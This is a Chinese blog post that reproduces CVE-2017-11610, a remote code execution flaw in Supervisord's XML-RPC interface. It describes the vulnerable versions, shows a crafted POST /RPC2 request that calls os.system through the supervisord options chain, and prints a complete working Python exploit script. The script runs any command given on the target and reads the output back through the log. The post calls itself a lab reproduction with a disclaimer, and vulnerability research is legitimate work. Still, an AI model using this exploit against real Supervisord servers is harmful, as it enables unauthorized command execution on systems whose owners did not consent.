远程桌面漏洞poc_Supervisord 远程代码执行漏洞(CVE201711610)漏洞复现

b6d4994d3f17cec24358fa37ee358c54.gif

漏洞信息

Supervisord是使用Python 开发的进程管理程序,Supervisord能够将命令行进程或服务变为后台运行的deamon(守护进程)。Supervisord拥有监控进程状态的功能,在进程异常退出时能够自动重启进程。


Supervisord在配置了Web接口后,服务器会启动一个XMLRPC服务器,端口号为9001,利用本漏洞,在获取接口访问权限后,远程攻击者可利用发送一段精心构造的请求,导致可在服务器执行任意代码。

漏洞影响版本

Supervisord 3.1.2 <= Version <= 3.3.2

开启环境

91e37ca1cebeb4157e784bcbb474c61f.png

抓包 发送到重发器  添加一下代码

supervisor.supervisord.options.warnings.linecache.os.system

touch /tmp/success

http头改成POST /RPC2

发送

c3d28858e80c019e451019728911df29.png

运行poc.py执行代码执行

857fb94e09f722e93c7241cfe4b10b07.png

poc.py代码

#!/usr/bin/env python3

import xmlrpc.client

import sys

target = sys.argv[1]

command = sys.argv[2]

with xmlrpc.client.ServerProxy(target) as proxy:

    old = getattr(proxy, 'supervisor.readLog')(0,0)

    logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()

    getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))

    result = getattr(proxy, 'supervisor.readLog')(0,0)

    print(result[len(old):])

注:本文只提供指数分享,请勿用作非法用途

c31749389437ed3b6b1c8ca5a2c79167.png

推荐文章++++

a168aaf922d1f011ef1a5be629a57d98.png

*通达OA任意用户登录 漏洞复现

*Windows远程桌面服务漏洞(CVE-2019-0708)复现测试

*CVE-2016-1531 简单利用

a8a26652b90188ddb77e3bf03045b21c.png

3cb13d567f25c5fdc8bdd1fb6414a7a9.gif

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值